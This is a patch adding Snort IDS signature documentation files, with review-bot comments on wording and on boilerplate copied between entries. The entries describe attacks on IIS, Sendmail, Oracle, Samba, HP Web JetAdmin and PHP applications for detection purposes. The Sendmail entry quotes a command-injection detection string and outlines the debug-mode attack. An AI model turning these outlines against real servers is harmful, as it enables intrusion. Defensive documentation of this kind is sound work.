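Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section are boilerplate about credential validation and an "authentication mechanism", which does not describe a remote file include through the "lang_settings" parameter of "include.php"; the scenario should describe an attacker passing a remote file location in that parameter, as the Summary already says. Wording: "an exploitation attempt has been attempted" is redundant ("an exploitation attempt has been made"), "ona web server" should be "on a web server", and "attackers choosing" needs an apostrophe. The file opens with two blank lines, the Sid and Affected Systems sections have no blank line before their "--" separator, and a trailing blank line follows the closing "--".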
--- /dev/null
+++ b/doc/signatures/986.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 986
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
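Review bot: this file repeats 2571.txt and 1026.txt word for word, so the alert again cannot be tied to what the rule matches; Detailed Information should name the file or request pattern on the IIS host. As in 1026.txt, the Sid number is on the "Sid:" line with two blank lines after it, the paragraphs are unwrapped, the Impact line needs punctuation ("Information gathering, possible administrator access."), and Additional References is empty.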
--- /dev/null
+++ b/doc/signatures/606.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 606
+
+--
+Summary: 
+This event is generated when an attempt to login as the superuser is attempted using rlogin.
+
+--
+Impact: 
+Serious. If successful the attacker may have gained superuser access to the host.
+
+--
+Detailed Information: 
+This rule generates an event when a connection is made using "rlogin" with the username "root". Such activity is indicative of attempts to abuse insecure machines with a known default configuration. 
+
+Some UNIX systems use the "rlogin" daemon which permits remote "root" logins. This may allow an attacker to connect to the machine and establish an interactive session.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with the "rlogin" service running and connects to it, then proceeds to guess the "root" password
+
+--
+Ease of Attack:
+Simple, no exploit software required
+
+--
+False Positives: 
+A system administrator may be logging in to a host using the username "root"
+
+--
+False Negatives: 
+If a local username is not the same as the remote one ("root"), the rule will not generate an event.
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+Deny remote root logins to the host, use a normal user and "sudo" or give the user the ability to "su" to root where appropriate.
+
+--
+Contributors:
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS389
+
+--
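Review bot: the Affected Systems section is missing from this file although Detailed Information says "Some UNIX systems use the "rlogin" daemon"; add it for consistency with the other entries. The Summary reads "an attempt to login as the superuser is attempted"; say "an attempt is made to log in as the superuser using rlogin". Several entries lack a terminating full stop (Attack Scenarios, Ease of Attack, False Positives, the first Corrective Action line), and "Simple, no exploit software required" should follow the two-sentence form used elsewhere ("Simple. No exploit software required.").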
--- /dev/null
+++ b/doc/signatures/2709.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2709
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_instantiation
+. This procedure is included in
+dbms_offline_og.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
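Review bot: the full stop after `begin_instantiation` has been pushed onto the next line ("begin_instantiation" / ". This procedure is included in"); join it into "…in the procedure begin_instantiation. This procedure is included in dbms_offline_og." "Oracle Oracle9i" repeats the vendor name, the headers carry trailing whitespace, and Additional References is empty although Corrective Action refers to a vendor patch.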
--- /dev/null
+++ b/doc/signatures/1603.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1603
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
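Review bot: the file names no vulnerability, product or matched content, so the Summary's "known vulnerability on a web server" cannot be traced to anything; Detailed Information should say what the rule looks for, or the entry should state that it is a generic web-attack rule. The credential-validation paragraph is boilerplate shared with several other entries in this patch and does not follow from the directory-traversal and buffer-overflow scenarios listed below it. "Web server" and "web server" are capitalised inconsistently within one sentence, "attackers choosing" needs an apostrophe, and Additional References is empty.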
--- /dev/null
+++ b/doc/signatures/100000660.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000660
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "text" parameter in the "guestbook.php" script 
+used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
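Review bot: the Impact paragraph ("system integrity compromise", "administrative access to the server", "execution of arbitrary code") and the "execute system binaries" sentence in Detailed Information are copied from the remote-file-include entries and overstate a cross site scripting issue, where the injected script runs in the browser of the user who follows the link, as Attack Scenarios correctly says; rewrite Impact around the theft of information from that user. "attackers choosing" needs an apostrophe, the Sid and Affected Systems sections have no blank line before "--", and a trailing blank line follows the closing "--".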
--- /dev/null
+++ b/doc/signatures/663.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+663
+
+--
+Summary:
+This event is generated when the string "|sed -e '1,/^$/'" is found in the payload of a packet sent to a Sendmail server.  This may be an attempt to exploit a problem in older versions of Sendmail. 
+
+--
+Impact:
+Attempted administrator access.  A successful attack can allow remote execution of commands at the privilege level of Sendmail, usually root.
+
+--
+Detailed Information:
+A vulnerability exists in older versions of Sendmail associated with the debug mode.  Malformed text specifying the recipient could be a command that would execute at the privilege level of Sendmail, often times root.  The "sed" command is used to strip off the mail headers before executing the supplied command.  This vulnerability was exploited by the Morris worm.
+
+--
+Affected Systems:
+Sendmail versions prior to 5.5.9.
+
+--
+Attack Scenarios:
+An attacker can craft a recipient name that is a command. This command executes arbitrary code on the server. 
+
+--
+Ease of Attack:
+Easy.  An attacker can telnet to port 25 of a vulnerable server, enter debug mode, and craft a malicious recipient containing a command to be executed.
+
+--
+False Positives:
+It is possible that this event may be generated by text in the DATA section of a pipelined SMTP transaction.
+
+--
+False Negatives:
+This rule generates an event based on a specific string in the packet payload.  An attacker could craft payloads with other malicious commands.
+
+--
+Corrective Action:
+Upgrade to Sendmail version 5.5.9 or higher.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
+
+Arachnids:
+http://www.whitehats.com/info/IDS172
+
+
+--
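Review bot: "often times" should be "oftentimes" (or simply "often"), the double spaces after full stops are out of step with the other entries, and Ease of Attack uses "Easy." where every other file uses "Simple.". An extra blank line precedes the closing "--". Otherwise this is one of the better entries in the set: the False Positives and False Negatives sections both describe the real limitation of matching on a fixed string.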
--- /dev/null
+++ b/doc/signatures/3000.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+3000
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
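Review bot: "A buffer overflow condition in the Microsoft implementation of the ASN.1 Library." is a sentence fragment ("A buffer overflow condition exists in …"), and Detailed Information has two typos, "taget" and "excuted". The Attack Scenarios section present in the other entries is missing here, and the final section is headed "References:" where every other file uses "Additional References:". The CVE link uses the candidate form CAN-2003-0818, which is the older naming of CVE-2003-0818; mentioning the current form would help readers searching by it.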
--- /dev/null
+++ b/doc/signatures/2548.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+2548
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web interface support for the HP JetAdmin printer.
+
+--
+Impact:
+A successful attack may allow unauthorized files to be read or the injection 
+of a .hts script on a vulnerable server.
+
+--
+Detailed Information:
+The HP Web JetAdmin provides a web interface for the administration of the HP
+Web JetAdmin printer.  A vulnerability exists that allows unauthorized
+files to be read or a .hts script to be executed.  This is caused when the
+/plugins/hpjdwm/script/test/setinfo.hts script is supplied a value to the
+setinclude parameter that represents an unauthorized file to be read outside
+the web root or represents a .hts file that will be executed with system
+privileges on the vulnerable server. 
+
+--
+Affected Systems:
+HP Web JetAdmin 7.2.
+
+--
+Attack Scenarios:
+An attacker can execute the vulnerable script and supply a value to setinclude
+indicating an unauthorized file to be read or an .hts file to be executed. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+An authorized administrator who uses the setinclude parameter with the above
+script from a source IP outside of the trusted network will cause a false positive alert.
+
+--
+False Negatives:
+The default HP Web JetAdmin port is 8000.  If an administrator selects a different port
+on which to run the web interface, no alert will be detected.  In that case, the rule
+should be altered to reflect the port on which the web interface runs.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch
+when it becomes available.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9972
+
+--
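Review bot: the product is described as a printer ("the HP JetAdmin printer", "administration of the HP Web JetAdmin printer"), which makes the first sentence of Detailed Information circular; the rest of the text treats HP Web JetAdmin as the web management application that ships the /plugins/hpjdwm/script/test/setinfo.hts script, so say that Web JetAdmin is HP's printer management software and that the vulnerable script belongs to it. "Additional References" is missing its colon, and the False Positives, False Negatives and Corrective Action paragraphs run well past the wrap width used in the rest of the file. The False Negatives note about the default port 8000 is useful; since the rule text is not part of this patch, say which rule variable or port value an administrator should edit.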
--- /dev/null
+++ b/doc/signatures/100000607.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000607
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_add.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "link_add.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2807.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2807
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure specify_new_masters
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
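Review bot: the procedure name in Detailed Information is broken across lines so the sentence reads "specify_new_masters" followed by a line holding only ". This procedure is included in"; join it into one sentence, "vulnerability in the procedure specify_new_masters. This procedure is included in dbms_repcat." Affected Systems also reads "Oracle Oracle9i" with the vendor name duplicated, and Additional References is empty for a vulnerability the text says has a vendor patch; add the Oracle advisory link.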
--- /dev/null
+++ b/doc/signatures/1799.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1799
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "fisting".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "fisting".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
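Review bot: the Summary has a grammatical slip, "a webpage was visited the included the content", which should read "a webpage was visited that included the content". The Additional References section also trails off into six empty "+" lines that the other documents in this patch do not carry; trim to a single blank line before the closing "--".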
--- /dev/null
+++ b/doc/signatures/289.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+289
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+QUALCOMM Qpopper POP3 buffer overflow vulnerability in SCO OpenServer 
+systems.
+
+--
+Impact:
+Remote execution of arbitrary code leading to remote root compromise.
+
+--
+Detailed Information:
+An exploit is available that takes advantage of a buffer overflow 
+vulnerability in QUALCOMM Qpopper POP3 mail server version 2.53 or 
+earlier. This exploit can be used to obtain root access to the 
+compromised server.
+
+--
+Affected Systems:
+SCO servers that ship QUALCOMM Qpopper POP3 server version 2.53 or 
+earlier:
+ -SCO OpenServer Enterprise System Release 5.0.5, 5.0.6, 5.0.6a
+ -SCO OpenServer Host System Release 5.0.5, 5.0.6, 5.0.6a
+ -SCO OpenServer Desktop System Release 5.0.5, 5.0.6, 5.0.6a
+ -SCO OpenServer Enterprise System Release 5.0.4
+ -SCO OpenServer Host System Release 5.0.4
+ -SCO OpenServer Desktop System Release 5.0.4
+
+--
+Attack Scenarios:
+An attacker executes exploit code against a vulnerable server and 
+obtains root privileges on the compromised computer.
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade QUALCOMM Qpopper. See ftp://stage.caldera.com/pub/security/openserver/CSSA-2001-SCO.8/ for patched binaries for SCO OpenServer and an advisory with installation instructions.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-1998-08.html
+
+--
--- /dev/null
+++ b/doc/signatures/119-16.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+119-16
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of an oversized chunk encoded request. This may be an indicator of
+an attack against a web server.
+
+This event may also indicate the use of http tunneling.
+
+--
+Affected Systems:
+	Apache
+
+--
+Attack Scenarios: 
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
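Review bot: Attack Scenarios is empty and Affected Systems lists only Apache, although the event is raised by the http_inspect preprocessor for oversized chunk-encoded requests to any HTTP server it inspects; either say so ("Any web server that accepts chunked requests") or explain why Apache alone is listed, and give at least one scenario in line with the Detailed Information (a chunk-size field larger than the configured limit, used to hide the rest of the request from the IDS or to tunnel traffic).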
--- /dev/null
+++ b/doc/signatures/2924.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2924
+
+--
+Summary:
+This event is generated when repeated failed attempts are made to access
+an SMB share.
+ 
+--
+Impact:
+Unknown. Possible information disclosure and loss of data.
+
+--
+Detailed Information:
+This event indicates that multiple failed attempts have been made to
+access an SMB network share. This may indicate a determined effort by an
+unauthorized user to access information and data on a network share.
+
+--
+Affected Systems:
+	All systems sharing resources using SMB
+
+--
+Attack Scenarios:
+An attacker can make repeated attempts to access network shares in an
+attempt to gain information.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply strict access control to all networked resources.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
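Review bot: False Positives says "None known", but Detailed Information itself only says repeated failures "may indicate" an unauthorized user, and a rule that fires on a count of failed share accesses will also fire on users mistyping credentials or on clients configured with stale ones; the section should say so, and Corrective Action should tell the reader to confirm the source host before treating the event as an attack.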
--- /dev/null
+++ b/doc/signatures/3029.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3029
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
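Review bot: Detailed Information describes the flaw as an integer overflow in memory allocation, while Attack Scenarios describes overflowing "a buffer containing the information for the access control lists"; the two sections should describe the same defect (an integer overflow in the size calculation that leads to a heap overflow, if that is what is meant). Also "heterogenous" should be "heterogeneous", and "remote server.The problem" is missing the space after the period.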
--- /dev/null
+++ b/doc/signatures/2588.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2588
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application TUTOS.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application TUTOS. The PHP application
+TUTOS is vulnerable to a path disclosure bug which may allow an attacker
+to gain information that can be used in further attacks against the
+system.
+
+The vulnerability surrounds the file note_overview.php, by manipulating
+input to the file an attacker may be presented with sensitive
+information regarding the system.
+
+--
+Affected Systems:
+	All systems using TUTOS.
+
+--
+Attack Scenarios:
+An attacker can leverage this vulnerability to gain information that may
+be useful in further attacks against the system.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
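Review bot: Corrective Action tells the reader to "Check the host logfiles and application logs for signs of compromise", but Impact and Detailed Information describe only a path disclosure; that sentence is carried over from the compromise templates and does not fit an information-leak bug. Additional References is also empty although the Summary calls this a known vulnerability; add the advisory for the note_overview.php issue.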
--- /dev/null
+++ b/doc/signatures/122-17.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-17
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a udp
+portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
